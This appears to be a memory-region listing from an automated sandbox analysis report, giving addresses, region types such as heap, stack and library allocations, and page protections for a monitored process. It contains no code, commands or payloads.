trusted library allocation
page read and write
AC5D000
heap
page read and write
6303000
heap
page read and write
88F9000
heap
page read and write
7A60000
trusted library allocation
page read and write
2F00000
heap
page read and write
72CA000
stack
page read and write
6303000
heap
page read and write
75C0000
trusted library allocation
page read and write
AD1D000
heap
page read and write
7F00000
trusted library allocation
page read and write
ACDF000
heap
page read and write
ABB0000
heap
page read and write
75DE000
stack
page read and write
6309000
heap
page read and write
4D6D000
trusted library allocation
page execute and read and write
ABB4000
heap
page read and write
764F000
stack
page read and write
6303000
heap
page read and write
2E78000
stack
page read and write
7BB4000
heap
page read and write
6305000
heap
page read and write
A5DC000
heap
page read and write
7EB0000
trusted library allocation
page read and write
6309000
heap
page read and write
78C0000
trusted library allocation
page read and write
6309000
heap
page read and write
4B2E000
stack
page read and write
52E0000
trusted library allocation
page execute and read and write
6303000
heap
page read and write
630D000
heap
page read and write
734B000
stack
page read and write
A723000
heap
page read and write
ABB0000
heap
page read and write
8910000
trusted library allocation
page read and write
AF1C000
heap
page read and write
AD47000
heap
page read and write
6309000
heap
page read and write
6D20000
trusted library allocation
page read and write
5401000
trusted library allocation
page read and write
6302000
heap
page read and write
9A20000
trusted library allocation
page read and write
7DDE000
stack
page read and write
ACFF000
heap
page read and write
6302000
heap
page read and write
6309000
heap
page read and write
BA91000
trusted library allocation
page read and write
772F000
stack
page read and write
7B32000
heap
page read and write
6309000
heap
page read and write
630D000
heap
page read and write
4EA2000
trusted library allocation
page read and write
2870000
heap
page read and write
6310000
heap
page read and write
74CE000
stack
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
AD11000
heap
page read and write
748D000
stack
page read and write
AC6B000
heap
page read and write
ABB1000
heap
page read and write
63C1000
trusted library allocation
page read and write
6303000
heap
page read and write
ABB1000
heap
page read and write
748E000
stack
page read and write
6309000
heap
page read and write
6305000
heap
page read and write
750E000
stack
page read and write
6305000
heap
page read and write
6305000
heap
page read and write
2E3C000
stack
page read and write
8ABC000
heap
page read and write
6309000
heap
page read and write
31E0000
heap
page read and write
76EE000
stack
page read and write
AC70000
heap
page read and write
6305000
heap
page read and write
8867000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
AA99000
heap
page read and write
6309000
heap
page read and write
356E000
stack
page read and write
88B2000
heap
page read and write
7AE5000
heap
page read and write
84E0000
heap
page read and write
2A39000
heap
page read and write
6309000
heap
page read and write
6309000
heap
page read and write
7E50000
trusted library allocation
page read and write
A641000
heap
page read and write
6302000
heap
page read and write
6309000
heap
page read and write
ADD8000
heap
page read and write
ABB8000
heap
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
6309000
heap
page read and write
CC49000
trusted library allocation
page read and write
28C0000
heap
page read and write
758E000
stack
page read and write
7CC0000
trusted library allocation
page read and write
70BD000
stack
page read and write
7B38000
heap
page read and write
6302000
heap
page read and write
630D000
heap
page read and write
6305000
heap
page read and write
4D8A000
trusted library allocation
page execute and read and write
6309000
heap
page read and write
52F0000
heap
page execute and read and write
6310000
heap
page read and write
A7B1000
heap
page read and write
6308000
heap
page read and write
33B8000
heap
page read and write
6303000
heap
page read and write
3298000
stack
page read and write
ABB4000
heap
page read and write
6309000
heap
page read and write
AC82000
heap
page read and write
C491000
trusted library allocation
page read and write
ABCD000
heap
page read and write
6307000
heap
page read and write
6310000
heap
page read and write
666E000
trusted library allocation
page read and write
AC49000
heap
page read and write
4DFE000
stack
page read and write
7B3B000
heap
page read and write
7ACD000
heap
page read and write
6305000
heap
page read and write
6309000
heap
page read and write
AD36000
heap
page read and write
6302000
heap
page read and write
53DC000
stack
page read and write
7A90000
trusted library allocation
page read and write
EBF1000
trusted library allocation
page read and write
6305000
heap
page read and write
880E000
stack
page read and write
7854000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
6302000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
7E30000
trusted library allocation
page read and write
3028000
heap
page read and write
4D70000
trusted library allocation
page read and write
ADB5000
heap
page read and write
A441000
trusted library allocation
page read and write
6308000
heap
page read and write
49BD000
stack
page read and write
6310000
heap
page read and write
60A9000
trusted library allocation
page read and write
630D000
heap
page read and write
8EEC000
stack
page read and write
6305000
heap
page read and write
78A0000
trusted library allocation
page execute and read and write
6309000
heap
page read and write
ACF3000
heap
page read and write
6309000
heap
page read and write
CACE000
stack
page read and write
ADB9000
heap
page read and write
4D95000
trusted library allocation
page execute and read and write
AD9B000
heap
page read and write
6310000
heap
page read and write
4E3F000
stack
page read and write
9A41000
trusted library allocation
page read and write
3310000
heap
page read and write
6305000
heap
page read and write
AC76000
heap
page read and write
6309000
heap
page read and write
6302000
heap
page read and write
AE8C000
heap
page read and write
AC50000
heap
page read and write
7AB0000
trusted library allocation
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
7CC9000
trusted library allocation
page read and write
6309000
heap
page read and write
33F6000
heap
page read and write
6309000
heap
page read and write
7E90000
trusted library allocation
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
AC70000
heap
page read and write
7B21000
heap
page read and write
ABB3000
heap
page read and write
ABB1000
heap
page read and write
497C000
stack
page read and write
7A9D000
heap
page read and write
ABB4000
heap
page read and write
6310000
heap
page read and write
595A000
trusted library allocation
page read and write
2EF0000
heap
page read and write
6309000
heap
page read and write
6C8E000
trusted library allocation
page read and write
AE98000
heap
page read and write
6309000
heap
page read and write
6308000
heap
page read and write
529E000
stack
page read and write
6303000
heap
page read and write
6309000
heap
page read and write
6081000
trusted library allocation
page read and write
6309000
heap
page read and write
AE35000
heap
page read and write
A8D0000
heap
page read and write
ACD6000
heap
page read and write
AD33000
heap
page read and write
6309000
heap
page read and write
7352000
heap
page read and write
CD9F000
trusted library allocation
page read and write
6310000
heap
page read and write
6305000
heap
page read and write
AC43000
heap
page read and write
AC48000
heap
page read and write
6310000
heap
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
2950000
heap
page read and write
70FE000
stack
page read and write
33B0000
heap
page read and write
ABB1000
heap
page read and write
776D000
stack
page read and write
7870000
trusted library allocation
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
85BE000
stack
page read and write
AD17000
heap
page read and write
4C7E000
stack
page read and write
4FEE000
stack
page read and write
84F0000
trusted library allocation
page execute and read and write
AD21000
heap
page read and write
4E60000
trusted library allocation
page read and write
6307000
heap
page read and write
ABB5000
heap
page read and write
AC89000
heap
page read and write
6310000
heap
page read and write
7E80000
trusted library allocation
page read and write
6309000
heap
page read and write
49D0000
heap
page read and write
6302000
heap
page read and write
A7B1000
heap
page read and write
ACD5000
heap
page read and write
8AC1000
heap
page read and write
319E000
stack
page read and write
AD32000
heap
page read and write
AD48000
heap
page read and write
CB11000
trusted library allocation
page read and write
52C0000
trusted library allocation
page read and write
33A0000
trusted library section
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
7220000
trusted library allocation
page read and write
4D86000
trusted library allocation
page execute and read and write
6310000
heap
page read and write
4D7D000
trusted library allocation
page execute and read and write
550E000
stack
page read and write
AD8E000
heap
page read and write
E511000
trusted library allocation
page read and write
AD1F000
heap
page read and write
6309000
heap
page read and write
ABBB000
heap
page read and write
6309000
heap
page read and write
CB61000
trusted library allocation
page read and write
6305000
heap
page read and write
A855000
heap
page read and write
7CB0000
trusted library allocation
page read and write
ABB0000
heap
page read and write
5081000
trusted library allocation
page read and write
6305000
heap
page read and write
3020000
heap
page read and write
35AE000
stack
page read and write
6303000
heap
page read and write
ABB7000
heap
page read and write
B491000
trusted library allocation
page read and write
ABB2000
heap
page read and write
33BF000
heap
page read and write
AC5A000
heap
page read and write
6302000
heap
page read and write
6302000
heap
page read and write
76AA000
stack
page read and write
6309000
heap
page read and write
6302000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
4F6B000
trusted library allocation
page read and write
6309000
heap
page read and write
452000
remote allocation
page execute and read and write
85D0000
trusted library allocation
page execute and read and write
4E20000
trusted library allocation
page read and write
6429000
trusted library allocation
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
AD47000
heap
page read and write
9411000
trusted library allocation
page read and write
6303000
heap
page read and write
4E39000
trusted library allocation
page read and write
8A80000
heap
page read and write
4EF8000
trusted library allocation
page read and write
6305000
heap
page read and write
6309000
heap
page read and write
6310000
heap
page read and write
6305000
heap
page read and write
6305000
heap
page read and write
6309000
heap
page read and write
71F0000
trusted library allocation
page read and write
6401000
trusted library allocation
page read and write
6305000
heap
page read and write
88BA000
heap
page read and write
51CD000
heap
page read and write
6309000
heap
page read and write
630D000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
6308000
heap
page read and write
31DE000
stack
page read and write
6310000
heap
page read and write
6303000
heap
page read and write
8900000
trusted library allocation
page execute and read and write
8A35000
trusted library allocation
page read and write
ACD6000
heap
page read and write
630D000
heap
page read and write
74CB000
stack
page read and write
71D0000
trusted library allocation
page read and write
ACE7000
heap
page read and write
52BF000
trusted library allocation
page read and write
6305000
heap
page read and write
AC6A000
heap
page read and write
AA70000
trusted library allocation
page read and write
330E000
heap
page read and write
3104000
heap
page read and write
6309000
heap
page read and write
7201000
trusted library allocation
page read and write
6303000
heap
page read and write
AC7C000
heap
page read and write
6303000
heap
page read and write
4E70000
trusted library allocation
page execute and read and write
6309000
heap
page read and write
53E0000
trusted library allocation
page read and write
ABB9000
heap
page read and write
6CE1000
trusted library allocation
page read and write
2C5F000
unkown
page read and write
ACF7000
heap
page read and write
595C000
trusted library allocation
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
AD11000
heap
page read and write
4D80000
trusted library allocation
page read and write
77FB000
heap
page read and write
ABB4000
heap
page read and write
AC7B000
heap
page read and write
6308000
heap
page read and write
6310000
heap
page read and write
77AB000
stack
page read and write
8500000
trusted library allocation
page read and write
6303000
heap
page read and write
88C6000
heap
page read and write
7350000
heap
page read and write
8AA4000
heap
page read and write
AE3E000
heap
page read and write
730E000
stack
page read and write
6310000
heap
page read and write
6302000
heap
page read and write
77FE000
stack
page read and write
6309000
heap
page read and write
6305000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
AC51000
heap
page read and write
AA91000
trusted library allocation
page read and write
6309000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
7B4F000
heap
page read and write
304A000
heap
page read and write
6309000
heap
page read and write
ABB2000
heap
page read and write
7B40000
heap
page read and write
6305000
heap
page read and write
52C4000
trusted library allocation
page read and write
6309000
heap
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
A8AA000
heap
page read and write
4E5B000
heap
page read and write
8ABA000
heap
page read and write
6310000
heap
page read and write
6305000
heap
page read and write
8EF0000
heap
page read and write
6310000
heap
page read and write
7240000
trusted library allocation
page read and write
6309000
heap
page read and write
7EE0000
trusted library allocation
page read and write
AC6D000
heap
page read and write
6309000
heap
page read and write
6310000
heap
page read and write
630D000
heap
page read and write
6303000
heap
page read and write
6228000
trusted library allocation
page read and write
6303000
heap
page read and write
7920000
trusted library allocation
page execute and read and write
A5BE000
heap
page read and write
85E0000
trusted library allocation
page execute and read and write
52C8000
trusted library allocation
page read and write
ABBE000
heap
page read and write
84C4000
stack
page read and write
EBA3000
trusted library allocation
page read and write
ABB6000
heap
page read and write
ABB1000
heap
page read and write
AC6E000
heap
page read and write
85C0000
heap
page read and write
7F10000
trusted library allocation
page read and write
ABB2000
heap
page read and write
71CB000
stack
page read and write
6309000
heap
page read and write
4DD0000
heap
page read and write
AC94000
heap
page read and write
ABB1000
heap
page read and write
6303000
heap
page read and write
AA80000
trusted library allocation
page read and write
6303000
heap
page read and write
6309000
heap
page read and write
ADE5000
heap
page read and write
AC5C000
heap
page read and write
AE39000
heap
page read and write
ABB6000
heap
page read and write
3405000
heap
page read and write
60E8000
trusted library allocation
page read and write
AD55000
heap
page read and write
7AD0000
trusted library allocation
page read and write
6310000
heap
page read and write
DB11000
trusted library allocation
page read and write
6310000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
AC72000
heap
page read and write
6305000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
AD5E000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
6302000
heap
page read and write
301E000
stack
page read and write
ACD6000
heap
page read and write
6309000
heap
page read and write
AC43000
heap
page read and write
6305000
heap
page read and write
ACF1000
heap
page read and write
7CD0000
trusted library allocation
page read and write
6309000
heap
page read and write
537E000
stack
page read and write
718D000
stack
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
6309000
heap
page read and write
7B4B000
stack
page read and write
6309000
heap
page read and write
AA40000
trusted library allocation
page execute and read and write
788E000
stack
page read and write
487E000
stack
page read and write
6303000
heap
page read and write
6305000
heap
page read and write
53F0000
heap
page read and write
49F0000
heap
page read and write
6309000
heap
page read and write
6310000
heap
page read and write
630D000
heap
page read and write
6303000
heap
page read and write
ADD4000
heap
page read and write
6303000
heap
page read and write
AD4C000
heap
page read and write
ABC5000
heap
page read and write
6310000
heap
page read and write
6305000
heap
page read and write
630D000
heap
page read and write
6310000
heap
page read and write
AC52000
heap
page read and write
A649000
heap
page read and write
760E000
stack
page read and write
6305000
heap
page read and write
7D9E000
stack
page read and write
4C2F000
stack
page read and write
7880000
heap
page execute and read and write
AD3E000
heap
page read and write
6303000
heap
page read and write
5035000
heap
page execute and read and write
4E30000
trusted library allocation
page read and write
6309000
heap
page read and write
6309000
heap
page read and write
7A80000
trusted library allocation
page read and write
6310000
heap
page read and write
4E50000
heap
page read and write
6305000
heap
page read and write
4F4A000
trusted library allocation
page read and write
4E67000
trusted library allocation
page read and write
630D000
heap
page read and write
ADA9000
heap
page read and write
6310000
heap
page read and write
52A2000
trusted library allocation
page read and write
25FB000
stack
page read and write
88F0000
heap
page read and write
4E9E000
trusted library allocation
page read and write
630D000
heap
page read and write
AC48000
heap
page read and write
AE44000
heap
page read and write
6303000
heap
page read and write
4D82000
trusted library allocation
page read and write
ACE3000
heap
page read and write
6305000
heap
page read and write
6309000
heap
page read and write
6309000
heap
page read and write
9A30000
trusted library allocation
page execute and read and write
6409000
trusted library allocation
page read and write
6305000
heap
page read and write
7E60000
trusted library allocation
page read and write
5CC8000
trusted library allocation
page read and write
AC44000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
ADBA000
heap
page read and write
6303000
heap
page read and write
CDF1000
trusted library allocation
page read and write
6305000
heap
page read and write
6309000
heap
page read and write
AC70000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
28BE000
unkown
page read and write
6309000
heap
page read and write
2A3B000
heap
page read and write
6303000
heap
page read and write
6305000
heap
page read and write
7BA0000
heap
page read and write
7EC0000
trusted library allocation
page read and write
6309000
heap
page read and write
29D8000
heap
page read and write
AE13000
heap
page read and write
6309000
heap
page read and write
6309000
heap
page read and write
6310000
heap
page read and write
630D000
heap
page read and write
6303000
heap
page read and write
A649000
heap
page read and write
6309000
heap
page read and write
AD6F000
heap
page read and write
783A000
stack
page read and write
6309000
heap
page read and write
ABB8000
heap
page read and write
AD1A000
heap
page read and write
EB88000
trusted library allocation
page read and write
6309000
heap
page read and write
6305000
heap
page read and write
AC61000
heap
page read and write
7CB6000
trusted library allocation
page read and write
6305000
heap
page read and write
6309000
heap
page read and write
9A10000
trusted library allocation
page read and write
AD7E000
heap
page read and write
57A5000
trusted library allocation
page read and write
6310000
heap
page read and write
52A0000
trusted library allocation
page read and write
4E50000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
7E40000
trusted library allocation
page execute and read and write
89D0000
heap
page read and write
6302000
heap
page read and write
7A7F000
heap
page read and write
8A9C000
heap
page read and write
AC56000
heap
page read and write
7B90000
heap
page execute and read and write
7B00000
trusted library allocation
page read and write
6307000
heap
page read and write
4F20000
trusted library allocation
page read and write
6303000
heap
page read and write
898D000
stack
page read and write
4CDE000
stack
page read and write
6309000
heap
page read and write
77E1000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
35F0000
heap
page read and write
AC80000
heap
page read and write
6302000
heap
page read and write
79CE000
stack
page read and write
6302000
heap
page read and write
766D000
stack
page read and write
63C2000
trusted library allocation
page read and write
6310000
heap
page read and write
3089000
heap
page read and write
7846000
heap
page read and write
6309000
heap
page read and write
29C3000
heap
page read and write
6305000
heap
page read and write
AD34000
heap
page read and write
AD38000
heap
page read and write
77B6000
heap
page read and write
6225000
trusted library allocation
page read and write
4E71000
trusted library allocation
page read and write
AC6F000
heap
page read and write
630D000
heap
page read and write
6309000
heap
page read and write
5561000
trusted library allocation
page read and write
6310000
heap
page read and write
2A55000
heap
page read and write
AD64000
heap
page read and write
ABB5000
heap
page read and write
6310000
heap
page read and write
6305000
heap
page read and write
2930000
heap
page read and write
AD2F000
heap
page read and write
6302000
heap
page read and write
71E0000
trusted library allocation
page read and write
660C000
trusted library allocation
page read and write
6305000
heap
page read and write
6307000
heap
page read and write
6305000
heap
page read and write
7CA0000
trusted library allocation
page read and write
ABB7000
heap
page read and write
6302000
heap
page read and write
ABB0000
heap
page read and write
291E000
stack
page read and write
6305000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
6310000
heap
page read and write
ABB8000
heap
page read and write
6309000
heap
page read and write
7E1D000
stack
page read and write
6309000
heap
page read and write
AC81000
heap
page read and write
630D000
heap
page read and write
6309000
heap
page read and write
AD59000
heap
page read and write
6303000
heap
page read and write
50E3000
trusted library allocation
page read and write
6305000
heap
page read and write
79BD000
stack
page read and write
791D000
stack
page read and write
29DB000
heap
page read and write
798E000
stack
page read and write
3365000
heap
page read and write
6310000
heap
page read and write
88B6000
heap
page read and write
6309000
heap
page read and write
546A000
trusted library allocation
page read and write
29BE000
heap
page read and write
6309000
heap
page read and write
6305000
heap
page read and write
630D000
heap
page read and write
6309000
heap
page read and write
6305000
heap
page read and write
6310000
heap
page read and write
325C000
stack
page read and write
ACFA000
heap
page read and write
6303000
heap
page read and write
8EAC000
stack
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
6305000
heap
page read and write
4D79000
trusted library allocation
page read and write
6305000
heap
page read and write
4D90000
trusted library allocation
page read and write
8A11000
trusted library allocation
page read and write
7B10000
heap
page read and write
AC75000
heap
page read and write
6305000
heap
page read and write
2935000
heap
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
ABB3000
heap
page read and write
ABB2000
heap
page read and write
4D92000
trusted library allocation
page read and write
6309000
heap
page read and write
7570000
trusted library section
page read and write
6310000
heap
page read and write
6310000
heap
page read and write
7AA0000
trusted library allocation
page read and write
6308000
heap
page read and write
8A90000
heap
page read and write
4FAE000
stack
page read and write
85F0000
trusted library allocation
page read and write
ABBB000
heap
page read and write
6303000
heap
page read and write
ABB9000
heap
page read and write
5380000
trusted library allocation
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
ADFC000
heap
page read and write
49F7000
heap
page read and write
EB7D000
trusted library allocation
page read and write
6309000
heap
page read and write
7210000
trusted library allocation
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
AC63000
heap
page read and write
ABBD000
heap
page read and write
6310000
heap
page read and write
AF7F000
heap
page read and write
2920000
heap
page read and write
AC81000
heap
page read and write
6467000
trusted library allocation
page read and write
ACD7000
heap
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
7595000
heap
page execute and read and write
6303000
heap
page read and write
4CE0000
heap
page read and write
AD67000
heap
page read and write
7890000
trusted library allocation
page read and write
25BB000
stack
page read and write
6303000
heap
page read and write
AE2B000
heap
page read and write
ABB5000
heap
page read and write
4DEE000
stack
page read and write
6305000
heap
page read and write
2990000
heap
page read and write
6310000
heap
page read and write
ABB1000
heap
page read and write
6310000
heap
page read and write
6303000
heap
page read and write
7A96000
heap
page read and write
71EA000
trusted library allocation
page read and write
7A40000
trusted library allocation
page read and write
5388000
trusted library allocation
page read and write
6303000
heap
page read and write
6303000
heap
page read and write
8600000
heap
page read and write
6309000
heap
page read and write
ABB0000
heap
page read and write
6303000
heap
page read and write
6310000
heap
page read and write
6309000
heap
page read and write
87CE000
stack
page read and write
6308000
heap
page read and write
4F10000
trusted library allocation
page read and write
743E000
stack
page read and write
6303000
heap
page read and write
7AE0000
trusted library allocation
page read and write
CB0C000
stack
page read and write
6309000
heap
page read and write
33B4000
heap
page read and write
6305000
heap
page read and write
6305000
heap
page read and write
4F0E000
stack
page read and write
6305000
heap
page read and write
77C6000
heap
page read and write
630D000
heap
page read and write
6303000
heap
page read and write
630D000
heap
page read and write
6310000
heap
page read and write
533E000
stack
page read and write
6309000
heap
page read and write
4EAD000
trusted library allocation
page read and write
AD04000
heap
page read and write
4D64000
trusted library allocation
page read and write
6305000
heap
page read and write
ACF5000
heap
page read and write
A7B1000
heap
page read and write
EB8C000
trusted library allocation
page read and write
4D50000
trusted library allocation
page read and write
315E000
stack
page read and write
78D0000
trusted library allocation
page read and write
6305000
heap
page read and write
4E6D000
trusted library allocation
page read and write
AD7E000
heap
page read and write
6309000
heap
page read and write
7EA0000
trusted library allocation
page read and write
ABB4000
heap
page read and write
AD9F000
heap
page read and write
6303000
heap
page read and write
7A50000
trusted library allocation
page read and write
6305000
heap
page read and write
6309000
heap
page read and write
4E60000
trusted library allocation
page read and write
6303000
heap
page read and write
AC60000
heap
page read and write
6310000
heap
page read and write
6303000
heap
page read and write
7770000
heap
page read and write
2A2F000
heap
page read and write
7B80000
trusted library allocation
page read and write
6309000
heap
page read and write
A7B1000
heap
page read and write
6303000
heap
page read and write
ABBA000
heap
page read and write
6310000
heap
page read and write
AC8C000
heap
page read and write
6309000
heap
page read and write
7A70000
heap
page read and write
6305000
heap
page read and write
7B27000
heap
page read and write
6305000
heap
page read and write
6309000
heap
page read and write
6303000
heap
page read and write
60A6000
trusted library allocation
page read and write
AC76000
heap
page read and write
4F0F000
trusted library allocation
page read and write
35EE000
stack
page read and write
4D63000
trusted library allocation
page execute and read and write
There are 1008 hidden memdumps, click here to show them.